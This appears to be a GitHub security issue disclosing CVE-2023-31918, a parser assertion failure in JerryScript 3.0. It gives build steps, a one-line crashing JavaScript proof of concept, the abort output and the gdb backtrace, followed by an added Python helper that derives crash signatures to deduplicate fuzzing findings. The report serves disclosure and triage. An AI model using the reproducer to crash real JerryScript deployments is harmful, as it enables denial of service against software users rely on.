CVE-2023-31918: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments) · Issue #5064 · jerryscript-project/je
JerryScript 3.0 (commit 1a2c047) was found to contain an assertion failure in parser_parse_function_arguments at jerry-core/parser/js/js-parser.c.
JerryScript revision
Commit: 1a2c047
Version: v3.0.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test case
// poc.js
class C { async#* method (
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1587.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
Backtrace
#0 0xf7fcfd99 in __kernel_vsyscall ()
#1 0xf7ca4276 in raise () from /lib32/libc.so.6
#2 0xf7c8c3f7 in abort () from /lib32/libc.so.6
#3 0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-port/common/jerry-port-process.c:29
#4 0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x08260d64 in jerry_assert_fail (assertion=0x84433e0 <str> "context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION",
file=0x8442ec0 <str> "jerryscript/jerry-core/parser/js/js-parser.c",
function=0x8443440 <__func__.parser_parse_function_arguments> "parser_parse_function_arguments", line=1587)
at jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6 0x0827592c in parser_parse_function_arguments (context_p=0xffffcd30, end_type=<optimized out>)
at jerryscript/jerry-core/parser/js/js-parser.c:1587
#7 0x0827240a in parser_parse_function (context_p=<optimized out>, status_flags=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser.c:2685
#8 0x08399b84 in lexer_construct_function_object (context_p=0xffffcd30, extra_status_flags=34717702)
at jerryscript/jerry-core/parser/js/js-lexer.c:2695
#9 0x083a30d3 in parser_parse_class_body (context_p=<optimized out>, opts=<optimized out>, class_name_index=0)
at jerryscript/jerry-core/parser/js/js-parser-expr.c:908
#10 parser_parse_class (context_p=<optimized out>, is_statement=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-expr.c:1110
#11 0x083c9959 in parser_parse_statements (context_p=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-statm.c:2787
#12 0x08284a26 in parser_parse_source (source_p=0xffffd030, parse_opts=<optimized out>, options_p=0xffffd100)
at jerryscript/jerry-core/parser/js/js-parser.c:2280
#13 0x08282c70 in parser_parse_script (source_p=0xffffd030, parse_opts=0, options_p=0xffffd100) at jerryscript/jerry-core/parser/js/js-parser.c:3326
#14 0x08129a7d in jerry_parse_common (source_p=0xffffd030, options_p=<optimized out>, parse_opts=0) at jerryscript/jerry-core/api/jerryscript.c:412
#15 0x08129698 in jerry_parse (source_p=<optimized out>, source_size=<optimized out>, options_p=<optimized out>)
at jerryscript/jerry-core/api/jerryscript.c:480
#16 0x083ea952 in jerryx_source_parse_script (path_p=<optimized out>) at jerryscript/jerry-ext/util/sources.c:52
#17 0x083eac12 in jerryx_source_exec_script (path_p=0xffffd5e0 "poc.js") at jerryscript/jerry-ext/util/sources.c:63
#18 0x0812162d in main (argc=<optimized out>, argv=<optimized out>) at jerryscript/jerry-main/main-desktop.c:156
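A crash-triage helper, added here as an example and not part of this report or of JerryScript: it parses the gdb backtrace above (re-joining gdb's wrapped frame lines and handling the inlined frame #10, which carries no address) and derives a stable crash signature from the first in-project frames below the abort/assert machinery, so duplicate findings from a parser fuzzing campaign can be bucketed. The backtrace text is copied from this report; the NOISE set and the signature format are assumptions.

```python
import re

# Backtrace copied from the report above, as gdb printed it (wrapped frames).
BACKTRACE = """\
#0  0xf7fcfd99 in __kernel_vsyscall ()
#1  0xf7ca4276 in raise () from /lib32/libc.so.6
#2  0xf7c8c3f7 in abort () from /lib32/libc.so.6
#3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-port/common/jerry-port-process.c:29
#4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5  0x08260d64 in jerry_assert_fail (assertion=0x84433e0 <str> "context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION",
    file=0x8442ec0 <str> "jerryscript/jerry-core/parser/js/js-parser.c",
    function=0x8443440 <__func__.parser_parse_function_arguments> "parser_parse_function_arguments", line=1587)
    at jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6  0x0827592c in parser_parse_function_arguments (context_p=0xffffcd30, end_type=<optimized out>)
    at jerryscript/jerry-core/parser/js/js-parser.c:1587
#7  0x0827240a in parser_parse_function (context_p=<optimized out>, status_flags=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser.c:2685
#8  0x08399b84 in lexer_construct_function_object (context_p=0xffffcd30, extra_status_flags=34717702)
    at jerryscript/jerry-core/parser/js/js-lexer.c:2695
#9  0x083a30d3 in parser_parse_class_body (context_p=<optimized out>, opts=<optimized out>, class_name_index=0)
    at jerryscript/jerry-core/parser/js/js-parser-expr.c:908
#10 parser_parse_class (context_p=<optimized out>, is_statement=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-expr.c:1110
"""

# "#N [0xADDR in] func (" -- the address is absent for inlined frames such as #10.
FRAME_RE = re.compile(r"^#(\d+)\s+(?:0x[0-9a-f]+ in )?(\S+) \(")
LOC_RE = re.compile(r" at (\S+):(\d+)")
# Frames belonging to the abort/assert machinery, not to the bug itself (assumed set).
NOISE = {"__kernel_vsyscall", "raise", "abort", "jerry_port_fatal", "jerry_fatal", "jerry_assert_fail"}

def parse_frames(text):
    """Re-join gdb's wrapped continuation lines, then return (func, file, line) per frame."""
    frames = []
    for raw in text.splitlines():
        if raw.startswith("#"):
            frames.append(raw)
        elif frames:
            frames[-1] += " " + raw.strip()  # continuation of the previous frame
    out = []
    for f in frames:
        m = FRAME_RE.match(f)
        if m:
            loc = LOC_RE.search(f)
            out.append((m.group(2), loc.group(1) if loc else None, int(loc.group(2)) if loc else None))
    return out

def crash_signature(text, depth=3):
    """First `depth` frames below the assert machinery as 'func:file:line' joined by '|'; stable across runs and ASLR."""
    useful = [fr for fr in parse_frames(text) if fr[0] not in NOISE]
    return "|".join(f"{fn}:{path.rsplit('/', 1)[-1]}:{ln}" if path else fn for fn, path, ln in useful[:depth])
```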
Credits:
@Ye0nny, @EJueon of the seclab-yonsei.